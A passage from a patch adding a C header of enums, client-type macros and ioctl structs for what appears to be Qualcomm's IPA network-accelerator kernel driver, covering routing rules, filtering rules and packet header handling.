+ (client) == IPA_CLIENT_APPS_WAN_CONS)
+
+#define IPA_CLIENT_IS_USB_CONS(client) \
+ ((client) == IPA_CLIENT_USB_CONS || \
+ (client) == IPA_CLIENT_USB2_CONS || \
+ (client) == IPA_CLIENT_USB3_CONS || \
+ (client) == IPA_CLIENT_USB_DPL_CONS || \
+ (client) == IPA_CLIENT_USB4_CONS)
+
+#define IPA_CLIENT_IS_WLAN_CONS(client) \
+ ((client) == IPA_CLIENT_WLAN1_CONS || \
+ (client) == IPA_CLIENT_WLAN2_CONS || \
+ (client) == IPA_CLIENT_WLAN3_CONS || \
+ (client) == IPA_CLIENT_WLAN4_CONS)
+
+#define IPA_CLIENT_IS_ODU_CONS(client) \
+ ((client) == IPA_CLIENT_ODU_EMB_CONS || \
+ (client) == IPA_CLIENT_ODU_TETH_CONS)
+
+#define IPA_CLIENT_IS_Q6_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_CONS || \
+ (client) == IPA_CLIENT_Q6_WAN_CONS || \
+ (client) == IPA_CLIENT_Q6_DUN_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_CONS || \
+ (client) == IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS)
+
+#define IPA_CLIENT_IS_Q6_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_PROD || \
+ (client) == IPA_CLIENT_Q6_WAN_PROD || \
+ (client) == IPA_CLIENT_Q6_CMD_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_PROD)
+
+#define IPA_CLIENT_IS_Q6_NON_ZIP_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_CONS || \
+ (client) == IPA_CLIENT_Q6_WAN_CONS || \
+ (client) == IPA_CLIENT_Q6_DUN_CONS || \
+ (client) == IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS)
+
+#define IPA_CLIENT_IS_Q6_ZIP_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_DECOMP_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_CONS)
+
+#define IPA_CLIENT_IS_Q6_NON_ZIP_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_PROD || \
+ (client) == IPA_CLIENT_Q6_WAN_PROD || \
+ (client) == IPA_CLIENT_Q6_CMD_PROD)
+
+#define IPA_CLIENT_IS_Q6_ZIP_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_DECOMP_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_PROD)
+
+#define IPA_CLIENT_IS_MEMCPY_DMA_CONS(client) \
+ ((client) == IPA_CLIENT_MEMCPY_DMA_SYNC_CONS || \
+ (client) == IPA_CLIENT_MEMCPY_DMA_ASYNC_CONS)
+
+#define IPA_CLIENT_IS_MEMCPY_DMA_PROD(client) \
+ ((client) == IPA_CLIENT_MEMCPY_DMA_SYNC_PROD || \
+ (client) == IPA_CLIENT_MEMCPY_DMA_ASYNC_PROD)
+
+#define IPA_CLIENT_IS_MHI_CONS(client) \
+ ((client) == IPA_CLIENT_MHI_CONS)
+
+#define IPA_CLIENT_IS_MHI(client) \
+ ((client) == IPA_CLIENT_MHI_CONS || \
+ (client) == IPA_CLIENT_MHI_PROD)
+
+#define IPA_CLIENT_IS_TEST_PROD(client) \
+ ((client) == IPA_CLIENT_TEST_PROD || \
+ (client) == IPA_CLIENT_TEST1_PROD || \
+ (client) == IPA_CLIENT_TEST2_PROD || \
+ (client) == IPA_CLIENT_TEST3_PROD || \
+ (client) == IPA_CLIENT_TEST4_PROD)
+
+#define IPA_CLIENT_IS_TEST_CONS(client) \
+ ((client) == IPA_CLIENT_TEST_CONS || \
+ (client) == IPA_CLIENT_TEST1_CONS || \
+ (client) == IPA_CLIENT_TEST2_CONS || \
+ (client) == IPA_CLIENT_TEST3_CONS || \
+ (client) == IPA_CLIENT_TEST4_CONS)
+
+#define IPA_CLIENT_IS_TEST(client) \
+ (IPA_CLIENT_IS_TEST_PROD(client) || IPA_CLIENT_IS_TEST_CONS(client))
+
+/**
+ * enum ipa_ip_type - Address family: IPv4 or IPv6
+ */
+enum ipa_ip_type {
+ IPA_IP_v4,
+ IPA_IP_v6,
+ IPA_IP_MAX
+};
+
+/**
+ * enum ipa_rule_type - Type of routing or filtering rule
+ * Hashable: Rule will be located at the hashable tables
+ * Non_Hashable: Rule will be located at the non-hashable tables
+ */
+enum ipa_rule_type {
+ IPA_RULE_HASHABLE,
+ IPA_RULE_NON_HASHABLE,
+ IPA_RULE_TYPE_MAX
+};
+
+/**
+ * enum ipa_flt_action - action field of filtering rule
+ *
+ * Pass to routing: 5'd0
+ * Pass to source NAT: 5'd1
+ * Pass to destination NAT: 5'd2
+ * Pass to default output pipe (e.g., Apps or Modem): 5'd3
+ */
+enum ipa_flt_action {
+ IPA_PASS_TO_ROUTING,
+ IPA_PASS_TO_SRC_NAT,
+ IPA_PASS_TO_DST_NAT,
+ IPA_PASS_TO_EXCEPTION
+};
+
+/**
+ * enum ipa_wlan_event - Events for wlan client
+ *
+ * wlan client connect: New wlan client connected
+ * wlan client disconnect: wlan client disconnected
+ * wlan client power save: wlan client moved to power save
+ * wlan client normal: wlan client moved out of power save
+ * sw routing enable: ipa routing is disabled
+ * sw routing disable: ipa routing is enabled
+ * wlan ap connect: wlan AP(access point) is up
+ * wlan ap disconnect: wlan AP(access point) is down
+ * wlan sta connect: wlan STA(station) is up
+ * wlan sta disconnect: wlan STA(station) is down
+ * wlan client connect ex: new wlan client connected
+ * wlan scc switch: wlan interfaces in scc mode
+ * wlan mcc switch: wlan interfaces in mcc mode
+ * wlan wdi enable: wdi data path completed
+ * wlan wdi disable: wdi data path teardown
+ */
+enum ipa_wlan_event {
+ WLAN_CLIENT_CONNECT,
+ WLAN_CLIENT_DISCONNECT,
+ WLAN_CLIENT_POWER_SAVE_MODE,
+ WLAN_CLIENT_NORMAL_MODE,
+ SW_ROUTING_ENABLE,
+ SW_ROUTING_DISABLE,
+ WLAN_AP_CONNECT,
+ WLAN_AP_DISCONNECT,
+ WLAN_STA_CONNECT,
+ WLAN_STA_DISCONNECT,
+ WLAN_CLIENT_CONNECT_EX,
+ WLAN_SWITCH_TO_SCC,
+ WLAN_SWITCH_TO_MCC,
+ WLAN_WDI_ENABLE,
+ WLAN_WDI_DISABLE,
+ IPA_WLAN_EVENT_MAX
+};
+
+/**
+ * enum ipa_wan_event - Events for wan client
+ *
+ * wan default route add/del
+ * wan embms connect: New wan embms interface connected
+ */
+enum ipa_wan_event {
+ WAN_UPSTREAM_ROUTE_ADD = IPA_WLAN_EVENT_MAX,
+ WAN_UPSTREAM_ROUTE_DEL,
+ WAN_EMBMS_CONNECT,
+ WAN_XLAT_CONNECT,
+ IPA_WAN_EVENT_MAX
+};
+
+enum ipa_ecm_event {
+ ECM_CONNECT = IPA_WAN_EVENT_MAX,
+ ECM_DISCONNECT,
+ IPA_ECM_EVENT_MAX,
+};
+
+enum ipa_tethering_stats_event {
+ IPA_TETHERING_STATS_UPDATE_STATS = IPA_ECM_EVENT_MAX,
+ IPA_TETHERING_STATS_UPDATE_NETWORK_STATS,
+ IPA_TETHERING_STATS_EVENT_MAX,
+ IPA_EVENT_MAX_NUM = IPA_TETHERING_STATS_EVENT_MAX
+};
+
+#define IPA_EVENT_MAX ((int)IPA_EVENT_MAX_NUM)
+
+/**
+ * enum ipa_rm_resource_name - IPA RM clients identification names
+ *
+ * Add new mapping to ipa_rm_prod_index() / ipa_rm_cons_index()
+ * when adding new entry to this enum.
+ */
+enum ipa_rm_resource_name {
+ IPA_RM_RESOURCE_PROD = 0,
+ IPA_RM_RESOURCE_Q6_PROD = IPA_RM_RESOURCE_PROD,
+ IPA_RM_RESOURCE_USB_PROD,
+ IPA_RM_RESOURCE_USB_DPL_DUMMY_PROD,
+ IPA_RM_RESOURCE_HSIC_PROD,
+ IPA_RM_RESOURCE_STD_ECM_PROD,
+ IPA_RM_RESOURCE_RNDIS_PROD,
+ IPA_RM_RESOURCE_WWAN_0_PROD,
+ IPA_RM_RESOURCE_WLAN_PROD,
+ IPA_RM_RESOURCE_ODU_ADAPT_PROD,
+ IPA_RM_RESOURCE_MHI_PROD,
+ IPA_RM_RESOURCE_PROD_MAX,
+
+ IPA_RM_RESOURCE_Q6_CONS = IPA_RM_RESOURCE_PROD_MAX,
+ IPA_RM_RESOURCE_USB_CONS,
+ IPA_RM_RESOURCE_USB_DPL_CONS,
+ IPA_RM_RESOURCE_HSIC_CONS,
+ IPA_RM_RESOURCE_WLAN_CONS,
+ IPA_RM_RESOURCE_APPS_CONS,
+ IPA_RM_RESOURCE_ODU_ADAPT_CONS,
+ IPA_RM_RESOURCE_MHI_CONS,
+ IPA_RM_RESOURCE_MAX
+};
+
+/**
+ * enum ipa_hw_type - IPA hardware version type
+ * @IPA_HW_None: IPA hardware version not defined
+ * @IPA_HW_v1_0: IPA hardware version 1.0
+ * @IPA_HW_v1_1: IPA hardware version 1.1
+ * @IPA_HW_v2_0: IPA hardware version 2.0
+ * @IPA_HW_v2_1: IPA hardware version 2.1
+ * @IPA_HW_v2_5: IPA hardware version 2.5
+ * @IPA_HW_v2_6: IPA hardware version 2.6
+ * @IPA_HW_v2_6L: IPA hardware version 2.6L
+ * @IPA_HW_v3_0: IPA hardware version 3.0
+ */
+enum ipa_hw_type {
+ IPA_HW_None = 0,
+ IPA_HW_v1_0 = 1,
+ IPA_HW_v1_1 = 2,
+ IPA_HW_v2_0 = 3,
+ IPA_HW_v2_1 = 4,
+ IPA_HW_v2_5 = 5,
+ IPA_HW_v2_6 = IPA_HW_v2_5,
+ IPA_HW_v2_6L = 6,
+ IPA_HW_v3_0 = 10,
+ IPA_HW_v3_1 = 11,
+ IPA_HW_MAX
+};
+
+/**
+ * struct ipa_rule_attrib - attributes of a routing/filtering
+ * rule, all in LE
+ * @attrib_mask: what attributes are valid
+ * @src_port_lo: low port of src port range
+ * @src_port_hi: high port of src port range
+ * @dst_port_lo: low port of dst port range
+ * @dst_port_hi: high port of dst port range
+ * @type: ICMP/IGMP type
+ * @code: ICMP/IGMP code
+ * @spi: IPSec SPI
+ * @src_port: exact src port
+ * @dst_port: exact dst port
+ * @meta_data: meta-data val
+ * @meta_data_mask: meta-data mask
+ * @u.v4.tos: type of service
+ * @u.v4.protocol: protocol
+ * @u.v4.src_addr: src address value
+ * @u.v4.src_addr_mask: src address mask
+ * @u.v4.dst_addr: dst address value
+ * @u.v4.dst_addr_mask: dst address mask
+ * @u.v6.tc: traffic class
+ * @u.v6.flow_label: flow label
+ * @u.v6.next_hdr: next header
+ * @u.v6.src_addr: src address val
+ * @u.v6.src_addr_mask: src address mask
+ * @u.v6.dst_addr: dst address val
+ * @u.v6.dst_addr_mask: dst address mask
+ */
+struct ipa_rule_attrib {
+ uint32_t attrib_mask;
+ uint16_t src_port_lo;
+ uint16_t src_port_hi;
+ uint16_t dst_port_lo;
+ uint16_t dst_port_hi;
+ uint8_t type;
+ uint8_t code;
+ uint8_t tos_value;
+ uint8_t tos_mask;
+ uint32_t spi;
+ uint16_t src_port;
+ uint16_t dst_port;
+ uint32_t meta_data;
+ uint32_t meta_data_mask;
+ uint8_t src_mac_addr[ETH_ALEN];
+ uint8_t src_mac_addr_mask[ETH_ALEN];
+ uint8_t dst_mac_addr[ETH_ALEN];
+ uint8_t dst_mac_addr_mask[ETH_ALEN];
+ uint16_t ether_type;
+ union {
+ struct {
+ uint8_t tos;
+ uint8_t protocol;
+ uint32_t src_addr;
+ uint32_t src_addr_mask;
+ uint32_t dst_addr;
+ uint32_t dst_addr_mask;
+ } v4;
+ struct {
+ uint8_t tc;
+ uint32_t flow_label;
+ uint8_t next_hdr;
+ uint32_t src_addr[4];
+ uint32_t src_addr_mask[4];
+ uint32_t dst_addr[4];
+ uint32_t dst_addr_mask[4];
+ } v6;
+ } u;
+};
+
+/*! @brief The maximum number of Mask Equal 32 Eqns */
+#define IPA_IPFLTR_NUM_MEQ_32_EQNS 2
+
+/*! @brief The maximum number of IHL offset Mask Equal 32 Eqns */
+#define IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS 2
+
+/*! @brief The maximum number of Mask Equal 128 Eqns */
+#define IPA_IPFLTR_NUM_MEQ_128_EQNS 2
+
+/*! @brief The maximum number of IHL offset Range Check 16 Eqns */
+#define IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS 2
+
+/*! @brief Offset and 16 bit comparison equation */
+struct ipa_ipfltr_eq_16 {
+ int8_t offset;
+ uint16_t value;
+};
+
+/*! @brief Offset and 32 bit comparison equation */
+struct ipa_ipfltr_eq_32 {
+ int8_t offset;
+ uint32_t value;
+};
+
+/*! @brief Offset and 128 bit masked comparison equation */
+struct ipa_ipfltr_mask_eq_128 {
+ int8_t offset;
+ uint8_t mask[16];
+ uint8_t value[16];
+};
+
+/*! @brief Offset and 32 bit masked comparison equation */
+struct ipa_ipfltr_mask_eq_32 {
+ int8_t offset;
+ uint32_t mask;
+ uint32_t value;
+};
+
+/*! @brief Equation for identifying a range. Ranges are inclusive */
+struct ipa_ipfltr_range_eq_16 {
+ int8_t offset;
+ uint16_t range_low;
+ uint16_t range_high;
+};
+
+/*! @brief Rule equations which are set according to DS filter installation */
+struct ipa_ipfltri_rule_eq {
+ /*! 16-bit Bitmask to indicate how many eqs are valid in this rule */
+ uint16_t rule_eq_bitmap;
+ /*! Specifies if a type of service check rule is present */
+ uint8_t tos_eq_present;
+ /*! The value to check against the type of service (ipv4) field */
+ uint8_t tos_eq;
+ /*! Specifies if a protocol check rule is present */
+ uint8_t protocol_eq_present;
+ /*! The value to check against the protocol (ipv6) field */
+ uint8_t protocol_eq;
+ /*! The number of ip header length offset 16 bit range check
+ * rules in this rule */
+ uint8_t num_ihl_offset_range_16;
+ /*! An array of the registered ip header length offset 16 bit
+ * range check rules */
+ struct ipa_ipfltr_range_eq_16
+ ihl_offset_range_16[IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS];
+ /*! The number of mask equal 32 rules present in this rule */
+ uint8_t num_offset_meq_32;
+ /*! An array of all the possible mask equal 32 rules in this rule */
+ struct ipa_ipfltr_mask_eq_32
+ offset_meq_32[IPA_IPFLTR_NUM_MEQ_32_EQNS];
+ /*! Specifies if the traffic class rule is present in this rule */
+ uint8_t tc_eq_present;
+ /*! The value to check the traffic class (ipv4) field against */
+ uint8_t tc_eq;
+ /*! Specifies if the flow equals rule is present in this rule */
+ uint8_t fl_eq_present;
+ /*! The value to check the flow (ipv6) field against */
+ uint32_t fl_eq;
+ /*! The number of ip header length offset 16 bit equations in this
+ * rule */
+ uint8_t ihl_offset_eq_16_present;
+ /*! The ip header length offset 16 bit equation */
+ struct ipa_ipfltr_eq_16 ihl_offset_eq_16;
+ /*! The number of ip header length offset 32 bit equations in this
+ * rule */
+ uint8_t ihl_offset_eq_32_present;
+ /*! The ip header length offset 32 bit equation */
+ struct ipa_ipfltr_eq_32 ihl_offset_eq_32;
+ /*! The number of ip header length offset 32 bit mask equations in
+ * this rule */
+ uint8_t num_ihl_offset_meq_32;
+ /*! The ip header length offset 32 bit mask equation */
+ struct ipa_ipfltr_mask_eq_32
+ ihl_offset_meq_32[IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS];
+ /*! The number of ip header length offset 128 bit equations in this
+ * rule */
+ uint8_t num_offset_meq_128;
+ /*! The ip header length offset 128 bit equation */
+ struct ipa_ipfltr_mask_eq_128
+ offset_meq_128[IPA_IPFLTR_NUM_MEQ_128_EQNS];
+ /*! The metadata 32 bit masked comparison equation present or not */
+ /* Metadata based rules are added internally by IPA driver */
+ uint8_t metadata_meq32_present;
+ /*! The metadata 32 bit masked comparison equation */
+ struct ipa_ipfltr_mask_eq_32 metadata_meq32;
+ /*! Specifies if the Fragment equation is present in this rule */
+ uint8_t ipv4_frag_eq_present;
+};
+
+/**
+ * struct ipa_flt_rule - attributes of a filtering rule
+ * @retain_hdr: bool switch to instruct IPA core to add back to the packet
+ * the header removed as part of header removal
+ * @to_uc: bool switch to pass packet to micro-controller
+ * @action: action field
+ * @rt_tbl_hdl: handle of table from "get"
+ * @attrib: attributes of the rule
+ * @eq_attrib: attributes of the rule in equation form (valid when
+ * eq_attrib_type is true)
+ * @rt_tbl_idx: index of RT table referred to by filter rule (valid when
+ * eq_attrib_type is true and non-exception action)
+ * @eq_attrib_type: true if equation level form used to specify attributes
+ * @max_prio: bool switch. is this rule with Max priority? meaning on rule hit,
+ * IPA will use the rule and will not look for other rules that may have
+ * higher priority
+ * @hashable: bool switch. is this rule hashable or not?
+ * ipa uses hashable rules to cache their hit results to be used in
+ * consecutive packets
+ * @rule_id: rule_id to be assigned to the filter rule. In case client specifies
+ * rule_id as 0 the driver will assign a new rule_id
+ */
+struct ipa_flt_rule {
+ uint8_t retain_hdr;
+ uint8_t to_uc;
+ enum ipa_flt_action action;
+ uint32_t rt_tbl_hdl;
+ struct ipa_rule_attrib attrib;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+ uint32_t rt_tbl_idx;
+ uint8_t eq_attrib_type;
+ uint8_t max_prio;
+ uint8_t hashable;
+ uint16_t rule_id;
+};
+
+/**
+ * enum ipa_hdr_l2_type - L2 header type
+ * IPA_HDR_L2_NONE: L2 header which isn't Ethernet II and isn't 802_3
+ * IPA_HDR_L2_ETHERNET_II: L2 header of type Ethernet II
+ * IPA_HDR_L2_802_3: L2 header of type 802_3
+ */
+enum ipa_hdr_l2_type {
+ IPA_HDR_L2_NONE,
+ IPA_HDR_L2_ETHERNET_II,
+ IPA_HDR_L2_802_3,
+ IPA_HDR_L2_MAX,
+};
+
+/**
+ * enum ipa_hdr_l2_type - Processing context type
+ * IPA_HDR_PROC_NONE: No processing context
+ * IPA_HDR_PROC_ETHII_TO_ETHII: Process Ethernet II to Ethernet II
+ * IPA_HDR_PROC_ETHII_TO_802_3: Process Ethernet II to 802_3
+ * IPA_HDR_PROC_802_3_TO_ETHII: Process 802_3 to Ethernet II
+ * IPA_HDR_PROC_802_3_TO_802_3: Process 802_3 to 802_3
+ */
+enum ipa_hdr_proc_type {
+ IPA_HDR_PROC_NONE,
+ IPA_HDR_PROC_ETHII_TO_ETHII,
+ IPA_HDR_PROC_ETHII_TO_802_3,
+ IPA_HDR_PROC_802_3_TO_ETHII,
+ IPA_HDR_PROC_802_3_TO_802_3,
+ IPA_HDR_PROC_MAX,
+};
+
+/**
+ * struct ipa_rt_rule - attributes of a routing rule
+ * @dst: dst "client"
+ * @hdr_hdl: handle to the dynamic header
+ it is not an index or an offset
+ * @hdr_proc_ctx_hdl: handle to header processing context. if it is provided
+ hdr_hdl shall be 0
+ * @attrib: attributes of the rule
+ * @max_prio: bool switch. is this rule with Max priority? meaning on rule hit,
+ * IPA will use the rule and will not look for other rules that may have
+ * higher priority
+ * @hashable: bool switch. is this rule hashable or not?
+ * ipa uses hashable rules to cache their hit results to be used in
+ * consecutive packets
+ * @retain_hdr: bool switch to instruct IPA core to add back to the packet
+ * the header removed as part of header removal
+ */
+struct ipa_rt_rule {
+ enum ipa_client_type dst;
+ uint32_t hdr_hdl;
+ uint32_t hdr_proc_ctx_hdl;
+ struct ipa_rule_attrib attrib;
+ uint8_t max_prio;
+ uint8_t hashable;
+ uint8_t retain_hdr;
+};
+
+/**
+ * struct ipa_hdr_add - header descriptor includes in and out
+ * parameters
+ * @name: name of the header
+ * @hdr: actual header to be inserted
+ * @hdr_len: size of above header
+ * @type: l2 header type
+ * @is_partial: header not fully specified
+ * @hdr_hdl: out parameter, handle to header, valid when status is 0
+ * @status: out parameter, status of header add operation,
+ * 0 for success,
+ * -1 for failure
+ * @is_eth2_ofst_valid: is eth2_ofst field valid?
+ * @eth2_ofst: offset to start of Ethernet-II/802.3 header
+ */
+struct ipa_hdr_add {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint32_t hdr_hdl;
+ int status;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+/**
+ * struct ipa_ioc_add_hdr - header addition parameters (support
+ * multiple headers and commit)
+ * @commit: should headers be written to IPA HW also?
+ * @num_hdrs: num of headers that follow
+ * @ipa_hdr_add hdr: all headers need to go here back to
+ * back, no pointers
+ */
+struct ipa_ioc_add_hdr {
+ uint8_t commit;
+ uint8_t num_hdrs;
+ struct ipa_hdr_add hdr[0];
+};
+
+/**
+ * struct ipa_hdr_proc_ctx_add - processing context descriptor includes
+ * in and out parameters
+ * @type: processing context type
+ * @hdr_hdl: in parameter, handle to header
+ * @proc_ctx_hdl: out parameter, handle to proc_ctx, valid when status is 0
+ * @status: out parameter, status of header add operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_proc_ctx_add {
+ enum ipa_hdr_proc_type type;
+ uint32_t hdr_hdl;
+ uint32_t proc_ctx_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_hdr - processing context addition parameters (support
+ * multiple processing context and commit)
+ * @commit: should processing context be written to IPA HW also?
+ * @num_proc_ctxs: num of processing context that follow
+ * @proc_ctx: all processing context need to go here back to
+ * back, no pointers
+ */
+struct ipa_ioc_add_hdr_proc_ctx {
+ uint8_t commit;
+ uint8_t num_proc_ctxs;
+ struct ipa_hdr_proc_ctx_add proc_ctx[0];
+};
+
+/**
+ * struct ipa_ioc_copy_hdr - retrieve a copy of the specified
+ * header - caller can then derive the complete header
+ * @name: name of the header resource
+ * @hdr: out parameter, contents of specified header,
+ * valid only when ioctl return val is non-negative
+ * @hdr_len: out parameter, size of above header
+ * valid only when ioctl return val is non-negative
+ * @type: l2 header type
+ * valid only when ioctl return val is non-negative
+ * @is_partial: out parameter, indicates whether specified header is partial
+ * valid only when ioctl return val is non-negative
+ * @is_eth2_ofst_valid: is eth2_ofst field valid?
+ * @eth2_ofst: offset to start of Ethernet-II/802.3 header
+ */
+struct ipa_ioc_copy_hdr {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+/**
+ * struct ipa_ioc_get_hdr - header entry lookup parameters, if lookup was
+ * successful caller must call put to release the reference count when done
+ * @name: name of the header resource
+ * @hdl: out parameter, handle of header entry
+ * valid only when ioctl return val is non-negative
+ */
+struct ipa_ioc_get_hdr {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t hdl;
+};
+
+/**
+ * struct ipa_hdr_del - header descriptor includes in and out
+ * parameters
+ *
+ * @hdl: handle returned from header add operation
+ * @status: out parameter, status of header remove operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_hdr - header deletion parameters (support
+ * multiple headers and commit)
+ * @commit: should headers be removed from IPA HW also?
+ * @num_hdls: num of headers being removed
+ * @ipa_hdr_del hdl: all handles need to go here back to back, no pointers
+ */
+struct ipa_ioc_del_hdr {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_del hdl[0];
+};
+
+/**
+ * struct ipa_hdr_proc_ctx_del - processing context descriptor includes
+ * in and out parameters
+ * @hdl: handle returned from processing context add operation
+ * @status: out parameter, status of header remove operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_proc_ctx_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * ipa_ioc_del_hdr_proc_ctx - processing context deletion parameters (support
+ * multiple headers and commit)
+ * @commit: should processing contexts be removed from IPA HW also?
+ * @num_hdls: num of processing contexts being removed
+ * @ipa_hdr_proc_ctx_del hdl: all handles need to go here back to back,
+ * no pointers
+ */
+struct ipa_ioc_del_hdr_proc_ctx {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_proc_ctx_del hdl[0];
+};
+
+/**
+ * struct ipa_rt_rule_add - routing rule descriptor includes in
+ * and out parameters
+ * @rule: actual rule to be added
+ * @at_rear: add at back of routing table, it is NOT possible to add rules at
+ * the rear of the "default" routing tables
+ * @rt_rule_hdl: output parameter, handle to rule, valid when status is 0
+ * @status: output parameter, status of routing rule add operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_rt_rule_add {
+ struct ipa_rt_rule rule;
+ uint8_t at_rear;
+ uint32_t rt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_rt_rule - routing rule addition parameters (supports
+ * multiple rules and commit);
+ *
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @rt_tbl_name: name of routing table resource
+ * @num_rules: number of routing rules that follow
+ * @ipa_rt_rule_add rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_add_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ char rt_tbl_name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_rules;
+ struct ipa_rt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_ioc_add_rt_rule_after - routing rule addition after a specific
+ * rule parameters(supports multiple rules and commit);
+ *
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @rt_tbl_name: name of routing table resource
+ * @num_rules: number of routing rules that follow
+ * @add_after_hdl: the rules will be added after this specific rule
+ * @ipa_rt_rule_add rules: all rules need to go back to back here, no pointers
+ * at_rear field will be ignored when using this IOCTL
+ */
+struct ipa_ioc_add_rt_rule_after {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ char rt_tbl_name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_rules;
+ uint32_t add_after_hdl;
+ struct ipa_rt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_rt_rule_mdfy - routing rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @rt_rule_hdl: handle to rule which supposed to modify
+ * @status: output parameter, status of routing rule modify operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_rt_rule_mdfy {
+ struct ipa_rt_rule rule;
+ uint32_t rt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_mdfy_rt_rule - routing rule modify parameters (supports
+ * multiple rules and commit)
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @num_rules: number of routing rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_mdfy_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_rules;
+ struct ipa_rt_rule_mdfy rules[0];
+};
+
+/**
+ * struct ipa_rt_rule_del - routing rule descriptor includes in
+ * and out parameters
+ * @hdl: handle returned from route rule add operation
+ * @status: output parameter, status of route rule delete operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_rt_rule_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_rt_rule - routing rule deletion parameters (supports
+ * multiple headers and commit)
+ * @commit: should rules be removed from IPA HW also?
+ * @ip: IP family of rules
+ * @num_hdls: num of rules being removed
+ * @ipa_rt_rule_del hdl: all handles need to go back to back here, no pointers
+ */
+struct ipa_ioc_del_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_hdls;
+ struct ipa_rt_rule_del hdl[0];
+};
+
+/**
+ * struct ipa_ioc_get_rt_tbl_indx - routing table index lookup parameters
+ * @ip: IP family of table
+ * @name: name of routing table resource
+ * @index: output parameter, routing table index, valid only when ioctl
+ * return val is non-negative
+ */
+struct ipa_ioc_get_rt_tbl_indx {
+ enum ipa_ip_type ip;
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t idx;
+};
+
+/**
+ * struct ipa_flt_rule_add - filtering rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @at_rear: add at back of filtering table?
+ * @flt_rule_hdl: out parameter, handle to rule, valid when status is 0
+ * @status: output parameter, status of filtering rule add operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_flt_rule_add {
+ struct ipa_flt_rule rule;
+ uint8_t at_rear;
+ uint32_t flt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_flt_rule - filtering rule addition parameters (supports
+ * multiple rules and commit)
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @ep: which "clients" pipe does this rule apply to?
+ * valid only when global is 0
+ * @global: does this apply to global filter table of specific IP family
+ * @num_rules: number of filtering rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_add_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ enum ipa_client_type ep;
+ uint8_t global;
+ uint8_t num_rules;
+ struct ipa_flt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_ioc_add_flt_rule_after - filtering rule addition after specific
+ * rule parameters (supports multiple rules and commit)
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @ep: which "clients" pipe does this rule apply to?
+ * @num_rules: number of filtering rules that follow
+ * @add_after_hdl: rules will be added after the rule with this handle
+ * @rules: all rules need to go back to back here, no pointers. at rear field
+ * is ignored when using this IOCTL
+ */
+struct ipa_ioc_add_flt_rule_after {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ enum ipa_client_type ep;
+ uint8_t num_rules;
+ uint32_t add_after_hdl;
